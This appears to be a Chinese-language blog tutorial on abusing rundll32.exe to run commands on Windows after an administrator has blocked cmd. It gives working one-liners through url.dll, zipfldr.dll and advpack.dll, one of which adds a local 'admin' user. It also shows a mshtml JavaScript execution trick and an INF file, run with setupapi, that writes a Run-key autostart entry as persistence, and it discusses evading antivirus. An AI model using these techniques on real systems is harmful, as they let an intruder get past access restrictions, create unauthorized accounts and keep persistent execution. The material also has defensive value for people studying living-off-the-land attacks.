rundll32 实用技巧篇
windows下遇到管理员把cmd命令给禁止了 就不能执行命令了么 ?还有很多能执行名利的工具 比如rundll32
0x01简介
rundll32就是:
run(运行)
dll(动态链接库)
所以rundll32.exe就是来运行那些不能作为程序单独运行的dll文件。rundll32 或 rundll 独立运行都是不起作用的目的就是运行dll文件。
像这样
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>
EntryPoint就是要执行的函数 原型如下:
void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);
0x02 执行命令
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
rundll32 zipfldr.dll, RouteTheCall calc.exe
rundll32 advpack.dll, RegisterOCX calc.exe
rundll32 advpack.dll, RegisterOCX "cmd.exe /c net user admin /add && rem .exe"
不过执行net use 命令需要管理员权限
否则的话 不能新建用户
用rundll32 执行js 或者 vb脚本
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('a')","vbs");window.close()
这个基本上win10的防火墙或者自己的杀毒软件都会拦截 所以我在虚拟机里运行如下:
0x03 rundll32操作注册表
增加注册表启动项,代码如下:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun,0x00000000,c:/1.exe
燃后运行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/1.inf
得到结果如下:
前提 必须是管理员权限
自我感觉rundll的利用没有那么简单了, 因为杀软很多都针对了 而且很多命令都需要管理员权限
或许有更多的姿势 只是还没有了解到吧 后面还会继续添加.